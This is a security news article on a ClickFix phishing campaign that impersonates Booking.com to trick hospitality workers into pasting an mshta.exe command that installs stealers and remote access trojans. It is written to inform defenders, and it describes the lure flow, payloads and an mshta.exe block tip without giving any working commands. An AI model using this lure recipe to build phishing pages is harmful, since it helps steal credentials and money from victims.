A newly uncovered phishing campaign is targeting employees in the hospitality sector by impersonating Booking.com, one of the world’s largest online travel agencies. At the heart of the campaign is a clever trick called ClickFix—a social engineering tactic that convinces users to execute malware on their own systems.
First detected in December 2024, the campaign has been traced to a threat actor Microsoft tracks as Storm-1865, and its impact has stretched across North America, Europe, Oceania, and Southeast Asia. The goal? Steal login credentials, plant malware, and commit financial fraud.
A Simple Email, a Fake Review, and a Deceptive Link
Booking.com as the Bait
The attack begins with an email that appears to come from Booking.com, claiming a customer has posted a negative review. The target is asked to respond or provide feedback.
Included in the message is either a link or a PDF file with a clickable link, which appears to take the recipient to the real Booking.com website. But clicking it leads elsewhere—a fake CAPTCHA page, carefully designed to mimic Booking.com’s branding in the background.
This tactic helps lower the victim’s guard, encouraging them to follow on-screen instructions.
ClickFix: The Technique Fooling Even Cautious Users
Turning Victims into Unknowing Attackers
The ClickFix method is at the core of this phishing attack. Once users reach the fake CAPTCHA screen, they’re prompted to press Windows + R, paste a command from the site, and press Enter.
That command quietly uses a built-in Windows utility—mshta.exe—to pull in the malware payload.
This user-driven technique works so well because it bypasses traditional security filters, which often rely on detecting malicious links or file attachments. In this case, the user unwittingly runs the code themselves, making the attack difficult to stop.
What Happens Next?
The malware installed varies but includes well-known threats like:
- XWorm – A remote access trojan (RAT)
- Lumma Stealer – Steals browser data, credentials, and more
- VenomRAT, AsyncRAT, Danabot, NetSupport RAT – Other tools for stealing data and gaining remote control
All of them give the attacker ongoing access to the victim’s machine and sensitive information.
Storm-1865: A Growing and Evolving Threat Actor
From E-commerce to Hospitality
Microsoft previously observed Storm-1865 targeting online shoppers with fake payment pages linked to platforms like Gmail and iCloud. Their tactics continue to evolve as they now use vendor-specific lures, such as Booking.com-themed emails, to reach industry-specific employees.
This campaign is part of a larger trend in which threat actors are refining their phishing lures to match the roles and behaviors of their targets.
Not Just Criminals: APTs Are Now Using ClickFix Too
Nation-State Actors Adopt the Same Technique
Cybersecurity experts have reported that even advanced persistent threat (APT) groups linked to countries like Russia and Iran are now using ClickFix in their campaigns.
One example is APT28 (associated with Russia), and another is MuddyWater (believed to be linked to Iran). Both have integrated ClickFix in recent social engineering attacks.
According to Group-IB, the success of this method lies in its ability to trick users into completing the infection process themselves—a clever way to dodge detection.
Variations on the ClickFix Theme
ClickFix Is Versatile—and It’s Spreading Fast
Security firms have observed several variations of ClickFix-based attacks, including:
- Fake CAPTCHA challenges that launch PowerShell scripts delivering Lumma and Vidar Stealers
- Google reCAPTCHA-themed lures deployed by the Blind Eagle group
- Booking confirmation links that redirect to malware download pages
- Windows-themed decoy pages that prompt similar command execution steps
Each variant uses a false problem and a misleading solution to push the user into action. And once they comply, the malware silently moves in.
GitHub Repositories as Malware Launchpads
AI-Generated Pages, Real-World Damage
In one ClickFix campaign analyzed by Trend Micro, attackers uploaded fake GitHub repositories using AI-generated descriptions and fake reviews. These pages offered:
- Game cheats
- Cracked tools
- Cryptocurrency utilities
Victims downloaded ZIP files thinking they were getting something helpful, but instead received a loader program—named SmartLoader—which deployed Lumma Stealer.
The abuse of trusted platforms like GitHub makes detection and prevention much harder, especially for individuals and small businesses.
G DATA Reports Regional Focus
Victims in Germany and the Philippines
According to German security firm G DATA, one variation of this campaign has heavily targeted users in Germany and the Philippines.
The company observed fake Booking.com messages embedded with ClickFix steps that led directly to the Lumma Stealer—a repeated choice among attackers due to its wide functionality and high success rate.
Other Recent Stealer Campaigns and Evolution
Beyond Lumma: The Rise of StrelaStealer and Custom Loaders
Alongside Lumma and XWorm, other stealers are appearing more often. Trustwave recently shared findings about StrelaStealer, delivered through fake invoice emails.
This malware uses layered obfuscation and custom crypters like Stellar Loader to hide from antivirus tools. It reflects a larger move toward highly customized delivery tools built to match specific payloads.
Why ClickFix Works So Well
It Uses Trust, Not Tech, to Bypass Security
ClickFix doesn’t rely on hidden exploits or zero-day flaws. Instead, it exploits human behavior:
- Users believe they’re solving a problem
- They follow the instructions willingly
- The malware avoids detection because the user starts the process
It’s a new twist on social engineering that combines familiar-looking websites, minor tech jargon, and urgency to move quickly from click to infection.
How to Protect Against ClickFix Campaigns
Tips for Individuals and Organizations
- Never follow manual commands from unknown websites
- Watch for urgency or emotional manipulation in emails
- Train teams on emerging phishing methods, including ClickFix
- Block access to mshta.exe if not used internally
- Use email filtering to catch fake travel or invoice messages
- Apply behavioral monitoring tools to detect abnormal command use
FAQs
What is the ClickFix technique in phishing?
ClickFix is a social engineering method where a fake webpage tells the user to run a command on their computer, usually resulting in malware installation.
How is Booking.com used in the phishing scam?
Attackers pretend to send negative reviews from Booking.com to hospitality workers. The email includes links or PDFs that direct users to fake sites prompting malware installation.
What types of malware are dropped in these attacks?
Common payloads include Lumma Stealer, XWorm, NetSupport RAT, VenomRAT, and Danabot.
Why does ClickFix evade security tools?
Because the victim willingly runs the command, traditional antivirus tools may not see it as suspicious.
Who is Storm-1865?
A threat actor tracked by Microsoft responsible for phishing and financial fraud across various industries, now using ClickFix tactics.
Are APT groups using ClickFix?
Yes. Nation-state actors from countries like Russia and Iran have adopted ClickFix to deliver malware like KoSpy and SMOKESABER.
